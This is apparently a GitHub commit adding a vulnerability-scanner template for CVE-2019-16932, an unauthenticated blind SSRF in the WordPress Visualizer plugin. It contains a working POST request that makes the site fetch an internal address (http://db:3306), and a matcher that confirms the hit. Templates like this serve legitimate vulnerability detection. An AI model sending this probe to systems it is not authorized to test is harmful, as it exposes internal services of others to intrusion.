Create CVE-2019-16932.yaml

patch-1
Prince Chaddha 2022-05-11 01:47:40 +05:30 committed by GitHub
parent a0b69562f1
commit 869d89ec88
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: CVE-2019-16932
info:
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
author: akincibor
severity: high
description: |
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
metadata:
verified: true
tags: wp-plugin,ssrf,wordpress,wp,xss,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
body: '{\"url\":\"http://db:3306\"}'
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'db_1'
part: body